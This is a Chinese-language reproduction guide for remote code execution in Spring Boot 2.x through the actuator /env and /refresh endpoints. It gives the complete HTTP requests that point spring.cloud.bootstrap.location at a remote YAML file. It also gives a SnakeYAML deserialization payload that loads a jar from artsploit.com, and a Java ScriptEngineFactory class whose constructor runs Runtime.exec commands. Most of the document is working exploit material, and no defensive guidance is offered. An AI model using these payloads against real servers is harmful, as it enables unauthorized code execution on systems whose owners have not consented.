Spring Boot 修改环境属性导致的rce
=================================

一、漏洞简介
------------

二、漏洞影响
------------

Spring Boot 2.x

三、复现过程
------------

环境下载 https://github.com/ianxtianxt/actuator-testbed

    POST /env HTTP/1.1
    Host: 127.0.0.1:8090
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 59
     
    spring.cloud.bootstrap.location=http://artsploit.com/yaml-payload.yml

该请求修改了"
spring.cloud.bootstrap.location"属性，该属性用于加载外部配置并以YAML格式解析它。为了做到这一点，我们还需要调用"
 refresh"端点。

    POST /refresh HTTP/1.1
    Host: 127.0.0.1:8090
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 0

从远程服务器获取YAML配置时，将使用SnakeYAML库进行解析，该库也容易受到反序列化攻击。有效载荷（yaml-payload.yml）可以通过使用前述的Marshalsec研究生成：

    !!javax.script.ScriptEngineManager [
      !!java.net.URLClassLoader [[
        !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
      ]]
    ]

该文件的反序列化将触发提供的URLClassLoader的ScriptEngineManager构造函数的执行。简而言之，它导致了\*\*\'java.util.ServiceLoader＃load（java.lang.Class
，java.lang.ClassLoader）\'\*\*方法，该方法试图在所有库中查找\'ScriptEngineFactory\'接口的所有实现。在类路径中。由于我们可以通过URLClassLoader添加新的库，因此我们可以在其中包含恶意字节码的情况下为新的\'ScriptEngineFactory\'提供服务。为此，我们需要使用以下必需文件创建一个jar归档文件：https://github.com/ianxtianxt/yaml-payload/blob/master/src/artsploit/AwesomeScriptEngineFactory.java应该包含实际的字节码，并在构造函数中带有恶意负载。

    public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
     
        public AwesomeScriptEngineFactory() {
            try {
                Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
                Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
            } catch (IOException e) {
                e.printStackTrace();
            }

https://github.com/ianxtianxt/yaml-payload/blob/master/src/META-INF/services/javax.script.ScriptEngineFactory应该只是一个包含对\'artsploit.AwesomeScriptEngineFactory\'的完整引用的文本文件，以便ServiceLoader知道在哪里可以找到该类：**artsploit.AwesomeScriptEngineFactory**同样，这种利用技术要求弹簧云位于类路径中，但是与Eureka的XStream有效负载相比，它甚至可以在最新版本中使用